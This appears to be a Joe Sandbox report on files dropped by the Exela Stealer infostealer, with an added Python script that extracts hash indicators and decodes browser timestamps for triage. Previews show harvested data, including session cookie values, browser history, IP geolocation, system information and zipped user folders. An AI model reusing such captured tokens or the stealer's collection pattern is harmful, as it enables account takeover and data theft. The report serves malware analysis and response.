                                                                                                                                                                                                                                                          Preview:PK...........Y................Browsers/PK...........Y................Wallets/PK...........Y..(.5...x.......Display (1).pngT.y<T...}f.l.FEe7".M...!F.A..*K%d7.)d.{d..e.d.*..X..B.}..,...w.......9.1.u]...z.'..X....n.....:.......p.`...Tm...n........?u_.H...bx.w./.z..t..._..@-.y.......y......8.3.f....1..?5.i...K[.Y.....=....:|t..ci.N. H+A..+...U<KT....$.r}"....w!.#...{.......(...-..[F...o*....t...b.....W......dH........a...O... ...>3>B...=..?.I.|uE..2m6?O.;#...b..".$Z4......1p#5.K...U..DX.]..5G...M....^..|r...nuF..e.....l..3?..'W..9..O.9*nN..Ob.;~z...z.}..~........M..q%|..K...xg.#..........e.......+."......W....H.w._y..oD.@....,.$).........{ay......N....zoAj...V..}.._.V..~.p.Q......%e+.-..^.+YWO|.jp....b=...=o....[w.....v..I.l.%..I.|..O.._.W..J.K......cbU..#.2...].,.....U..l*..)....'...*.E.?}..b..f.w8%.~lPm.z..H...g.........O.L#...'..~.4uN.w'm....[^..T_d..."...\...].......Rm..........X.....Cw..E...x.;........6.Z......_...(..n.......J..SU...<..=.(4.(
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3488
                                                                                                                                                                                                                                                          Entropy (8bit):5.880132531509811
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:LMJMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:eFFRiNEUd7
                                                                                                                                                                                                                                                          MD5:A77A3F14636E05B646BDD2E385CFCDC3
                                                                                                                                                                                                                                                          SHA1:11C80A73FB067FFB85C9BD80E66EF1179D1EBFB8
                                                                                                                                                                                                                                                          SHA-256:E0BD0C615EFC6E89164589897A280C9CB72FEF9084466AB63E77B0BA9939D6C0
                                                                                                                                                                                                                                                          SHA-512:46E3C8284596248FA43F9C767CE36F876B4B63B64D6CD2A93904CB3866E856D2043CFCC03537E4C9169DB59FD2F868FAB0989706DE4AFD48EEEC15EB43346656
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.133
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1737
                                                                                                                                                                                                                                                          Entropy (8bit):4.137394051573412
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:L5xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQFEDK4:LzlVVgmHgWdIoV
                                                                                                                                                                                                                                                          MD5:FC2BE027B954580D7C389EE60BF7A809
                                                                                                                                                                                                                                                          SHA1:9D2BEB95F433468ED667AA1ED8DD80C21D44FD4B
                                                                                                                                                                                                                                                          SHA-256:E291A44D3CEDA01F2D8FB5CA4828E33BF0ABA921E544168FDEFE7D77D0B99ADB
                                                                                                                                                                                                                                                          SHA-512:8C804E8F6C69C5F45CBF3FA8A01DBB17BA1DC5C5C4E14569621076D842756233DD2C2C6161F0997C77735A6C6C21C5DD9B1658549791008187D3BC22B8744F89
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..=========================================================================
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2728
                                                                                                                                                                                                                                                          Entropy (8bit):4.660039615120458
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:LFzmxDwemx5VcDKJMmx2VuDKJMmxhzxANLpzxAjVVpbjxA0ScpbjxAb:LFzmlwem/aDKMmAEDKMmfz0cdj7njU
                                                                                                                                                                                                                                                          MD5:20A3A44BDA7E4F584DE08D454799AE3B
                                                                                                                                                                                                                                                          SHA1:A9303AC5FA3167501761237DA4BF1872813A2D5F
                                                                                                                                                                                                                                                          SHA-256:B8D46AE104194B6FD27A55B0831CD2D14A2C656147A8A9AD3AC53656174439C0
                                                                                                                                                                                                                                                          SHA-512:2DE9ECF25CFE88E6CD07508E2936EFDAC1E0CC9E585B5B4194733CC1C61A30F9655C9519C44607C2CD7B4513BD8D1AE9644E066593254606862984E12EC7CD36
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID : 1..URL : https://go.microsoft.com/fwlink/?linkid=851546..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 2..URL : https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..====================================================================================..ID : 3..URL : https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us..itle : Examples of Office product keys - Microsoft Support..Visit Count : 2..Last Visit Time 13340808471256388..=======================================

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):705400
Entropy (8bit):7.926399061168775
Encrypted:false
SSDEEP:12288:uwaVun7OYV91jw2MtmRL6yzhEYEfOt0lZ6NNvgJaN87VlhYTqlxY8CLK:uwdn7Pf1sfsL6yz5OOt0T6N785R5l
MD5:2417AAD59CF8A5060AF2F0477AD2D7C5
SHA1:A99369C33B0844BBBF0A5BFB7F27D398D30B91AB
SHA-256:75C13C99E3EB621E857E5971B011A62D00CCA7DE44F92F291520F46D378CF55D
SHA-512:EFB630E5976E5E8667FE9A0619A1A725A745291193936288E4CB944EA04A9A762A368CD7EF9573A62BD9B7EB469A74E8AD0B26CB2C8AD1E2DAB4DB44BC9C6F9B
Malicious:false
Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y...../&.Z./..y..L.....nZ....p%@.y...@x...... ..9...{o........o..?...u]....."~..^{.}.Y.*...9.....R.^..f.h.m..^.K...u....S....i.l?w8.N..E...v_.d&..8A...S...e.+6.........c_.i.....O.TZ....c.3=i.m..`..>...Q.>...c..u...1v..i...i.>.i1..Gg....)./=<.c../>4mZ_x.a......?8.....dl.a......9..?w...g...}...}V..j .>35..eO...>...O.zc<`...7....E...z3..v_.}..=..;f.#.d.............g....+........q...wN.;..w.s.~..^v{j.v[...;.ewLb|..3c..[b.......+.oy.1{.w.5.v5v.%-.............v..1.W.......3...tK.[...i...N7...../..=...;.c.v.9.....h.......Mil..S{..Rk..s.....YLcA>...oI.,g...Y........<.x..io}]n}l.G[B..msC....[.x|k...L{.k...nI...}..si.lc.}..6.7.&..[..luMfl.S{.....m.Z.6.2......._KK....Y....5..X.y[....._.a..u...7.yC..M..oz...=.0...2...&...v..W..............^...9.0.....A{..v.&.fc.[j..x.F....i|C....)O.g..[..}.....[.\..._..Z.].c.....s....oc....b...5

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):266
Entropy (8bit):4.281502386532761
Encrypted:false
SSDEEP:3:111T8/s5hO7y9MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:Lv5hOP0X3RwwN3UuJA01K5CLpqI
MD5:23FB26C06CE6C057071E5346E4BF5BE2
SHA1:37E496FFFE731FC7AD155EE169642AF0DF7BA0C7
SHA-256:C7CDD16409A9F45463E6954219417EC5C7BC4EE66A0BCACC754D8D5C221F1E55
SHA-512:40E58FD7AEC9FBA2399F98374CB238B294FFF15417DBEA05DA1659158E4025795FFFE23E41BACD2A97C8F9E9FC212BF073A3C6C2BC4DB69B8BE168DDB996018B
Malicious:true
Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..8.46.123.189..United States..New York..America/New_York..Level 3 CenturyLink Communications, LLC AS3356 Level 3 Parent, LLC

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):25132
Entropy (8bit):4.741289899263353
Encrypted:false
SSDEEP:384:DUpzYO0HoYvsfSZ/jKlgqABH6FEo/QjNW3mBBU0NjbpMtBpxtiWz5qTUJehouX3K:vGuaxCH1Y
MD5:75E2CDFAF8449F81C9ADB2E052A92795
SHA1:2E0F4C7F515FE84B2F65FDF7A7959EDCA75A6B55
SHA-256:1EF4DC407B28C1682245797984446E522A5A5C6503ED67165F863B08952682CB
SHA-512:19F6BA37F17625A61110884FFB14A076F0D82EE7A0FCAB75A189C1020013F484F0373714679AF3CD5E3673781463BBD5566A631E07D3B1A1FB5FEF17B6BA1936
Malicious:true
Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 176 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 79'452 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'236 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'300 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'256 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'996 K......Image Name: winlogon.exe...PID: 552

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):142864
Entropy (8bit):4.373018293360665
Encrypted:false
SSDEEP:1536:4oc5+DlX7z8oiEmea91gbTvU2LaWJVQgDFIaLVk2vcE66drKwIRBFKdQT8RSayLM:4oJwx0
MD5:E6703F689A8802CB0607BF7A12E7E595
SHA1:9FB5AB2E92F7BDF5A2833178D06C5C2229D0E070
SHA-256:47A10599F80E3F23708B9457A577262307889C86EEBB2386290060B9A860A40A
SHA-512:6699322DE4CFE3EB5B58762BF490E5D6F817E896C9F38A34AEA91C9EB7FB48F14401F5A858653FA175099A57E58322B7938B3952802AEA875312F3201AB9C641
Malicious:true
Preview:----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71388-77104-AAOEM...Original Install Date: 03/10/2023, 09:57:18...System Boot Time: 24/09/2023, 13:00:03...System Manufacturer: Utu2VL2XAMrn6tk...System Model: G8bcud5P...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]: Inte

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:false
Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
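The dropped-file records above are the raw material a responder turns into indicators and a timeline. The script below is an added example for doing that; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It assumes only the key:value record layout shown in this section (one record per Process: line, the first colon separating key from value so that Windows paths and SSDEEP digests survive intact). It parses the records, returns the SHA-256 of every file the sandbox flagged Malicious:true, flags previews carrying the Telegram banner that Exela writes at the top of each dump, and decodes the Chrome/WebKit "Last Visit Time" value from the history-dump preview, which is microseconds since 1601-01-01 UTC rather than a Unix timestamp. The embedded sample records and the history snippet are constructed by copying two records and part of the preview from this page, with SHA-512 lines and most preview bytes cut for length.

```python
"""Triage helper for Joe Sandbox dropped-file records like the ones above.

Added example, not part of the original report or of Joe Sandbox's tooling.
Parses the Process/File Type/.../Preview records, collects SHA-256 IOCs for
files flagged Malicious:true, spots the Exela banner in previews, and decodes
the Chrome 'Last Visit Time' (microseconds since 1601-01-01 UTC, not Unix).
"""
import re
from datetime import datetime, timedelta, timezone

FIELDS = {"Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
          "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512",
          "Malicious", "Preview"}
COERCE = {"Size (bytes)": int, "Entropy (8bit)": float,
          "Encrypted": lambda v: v.lower() == "true",
          "Malicious": lambda v: v.lower() == "true"}
EXELA_BANNER = "https://t.me/ExelaStealer"
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Constructed sample: two records copied from the report, SHA-512 and most preview bytes cut.
SAMPLE = r"""
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):266
Entropy (8bit):4.281502386532761
Encrypted:false
SSDEEP:3:111T8/s5hO7y9MHUXMERwLM7N3U2bX5A3EwAyEY5HLWLASPVXqI:Lv5hOP0X3RwwN3UuJA01K5CLpqI
MD5:23FB26C06CE6C057071E5346E4BF5BE2
SHA1:37E496FFFE731FC7AD155EE169642AF0DF7BA0C7
SHA-256:C7CDD16409A9F45463E6954219417EC5C7BC4EE66A0BCACC754D8D5C221F1E55
Malicious:true
Preview:----------------------https://t.me/ExelaStealer----------------------..8.46.123.189..United States
Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
Malicious:false
Preview:SQLite format 3......@ .......8
"""
# Constructed: start of the browser-history dump preview, copied from the report.
HISTORY_PREVIEW = ("ID : 1..URL : https://go.microsoft.com/fwlink/?linkid=851546.."
                   "Visit Count : 2..Last Visit Time 13340808471256388..ID : 2..")


def parse_records(text):
    """One dict per dropped file; a record starts at each 'Process:' line.

    Only the first ':' separates key from value, so Windows paths and
    SSDEEP digests (both contain ':') survive intact.
    """
    records, cur = [], None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep or key not in FIELDS:
            continue                      # blank or non-field line
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = COERCE.get(key, str)(value.strip())
    return records


def malicious_sha256(records):
    """Lower-cased SHA-256 IOCs of every file the sandbox flagged malicious."""
    return sorted({r["SHA-256"].lower() for r in records if r.get("Malicious")})


def has_exela_banner(record):
    """Exela writes its Telegram banner at the top of every dump it drops."""
    return EXELA_BANNER in record.get("Preview", "")


def chrome_time(webkit_us):
    """Chrome/WebKit timestamp (microseconds since 1601-01-01 UTC) -> datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=int(webkit_us))


def last_visit_times(preview):
    """Every 'Last Visit Time' in a history dump, decoded to an aware UTC datetime."""
    return [chrome_time(m) for m in re.findall(r"Last Visit Time (\d+)", preview)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("IOCs:", malicious_sha256(recs))
    for r in recs:
        print(r["File Type"][:25], "MALICIOUS" if r["Malicious"] else "benign",
              "banner" if has_exela_banner(r) else "")
    for t in last_visit_times(HISTORY_PREVIEW):
        print("history entry visited", t.isoformat())
```

Three caveats when reading the output against this report. First, Malicious:false on the SQLite files means the sandbox did not flag their content; it does not make the drop benign, since the same process, rename_me_before.exe, wrote them, and their hashes identify copied data stores rather than the malware, so they are poor IOCs. Second, the "Algol 68 source" label on the 142864-byte file is a libmagic guess; the preview shows it is a systeminfo dump, so do not hunt for Algol sources. Third, the Last Visit Time 13340808471256388 decodes to 2023-10-03 12:07:51 UTC, the same day as the Original Install Date (03/10/2023, day/month format as the 24/09/2023 boot time shows) in the systeminfo preview, so the three Office product-key pages in the history dump are residue of the analysis image rather than evidence of victim browsing.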

Process:C:\Users\user\Desktop\rename_me_before.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):126976
Entropy (8bit):0.47147045728725767
Encrypted:false
SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Wed Jan 1 03:37:43 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1380
                                                                                                                                                                                                                                                          Entropy (8bit):4.092570766206948
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:HCDW9cZfqOfDfHffwK0fINwI+ycuZhNyGakSjXPNnqSGd:MBH/oKwIm1ulla35qS2
                                                                                                                                                                                                                                                          MD5:8121F843C240AD969B454085B830C135
                                                                                                                                                                                                                                                          SHA1:B84BFF0D0EAB6E1D8B47695A89AE524D1A907CDB
                                                                                                                                                                                                                                                          SHA-256:F4E9F034E16098915746FDA842BEB4DBBB94504CDFF0EE2F0B1BD72ACEBC93B7
                                                                                                                                                                                                                                                          SHA-512:55C775D94BF341BC71ECCE68720BF4D75E332A5DF90E9C02DDEC4D19A0CADDD84B014D2A352D2BE75540B8D707163C4643CB1D6EEEFEA47E8CB077F9963A3147
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:L.....tg.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........S....c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP...................oC..O...c..}...........4.......C:\Users\user\AppData\Local\Temp\RES71B8.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.q.d.d.o.o.n.a...d.l.l.....(.....
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):79088
                                                                                                                                                                                                                                                          Entropy (8bit):7.82611639742698
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:tG5/p/kbmg0DxtBGxBcD8e+Bs8Ntp6GU8l/z175k/QtlbYlvr9MGFcEtjtQliQ+a:A5/Jkbmg0DxqxOD8e+Bs8NhUA/z175k4
                                                                                                                                                                                                                                                          MD5:8B06591158608C0DADE3C3D932750EB8
                                                                                                                                                                                                                                                          SHA1:146B8658371A13902ABD2E5BD1681A832A8E4601
                                                                                                                                                                                                                                                          SHA-256:2336771B9E2A38030278672D0B9ED98AF96B2B3F29A991E98F688B8025FBE0A2
                                                                                                                                                                                                                                                          SHA-512:4EF05F98AFC6E608278D4A0321DC4F67807076CA9DA208CDE1168E33C56F3F57CAA9EE1F1794312D7DD83B3052B99B3290D1593F8E802A6D38374D20AC2A6495
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:PK...........Y................DTBZGIOOSO/PK...........Y................Desktop/PK...........Y................Documents/PK...........Y................Downloads/PK...........Y................ONBQCLYSPU/PK...........Y................UMMBDNEQBN/PK...........Y................VLZDGUKUTZ/PK...........Y................XZXHAVGRAG/PK........Q@DW................Desktop/BPMLNOBVSB.jpg..I.E!.......8...N.?H.-.".Jt-.X....#......a....u...8z.)..R...'....?tD..d.5.%}..O;......yl..4...g..[.=V..Y.gJM....c..cb.EF......C;&.^R...p..<.rQ..R......Vz....|....C.x.b.O..$\&..23Xj%...\]....BJ....).fh..|.rD.<.8.d.....S4.eIg`.-.....~.Y.a&.........=..=6....S.hw...B.E.$v........iK..=../L..8...`....LK.X...'..X..7.....vy.q.6N[.|f..v.O<.=:b...9e.o+..:y....3tL..{u.g.y..t..p"..a.Y.X...L...4=..FI.."..2....,.-.2Vm....^..1$..:.*..v......i...qk..#...<uWtD._....@.....p...6....\w?dw.10..l.>.Z........).c.h.D..8.r......F....u...;=...Lcj...q....u...+.}'...-..._....Y..m.......~_/...v&.5.;cB.r.u"
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                                          MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                                          SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                                          SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                                          SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview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
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
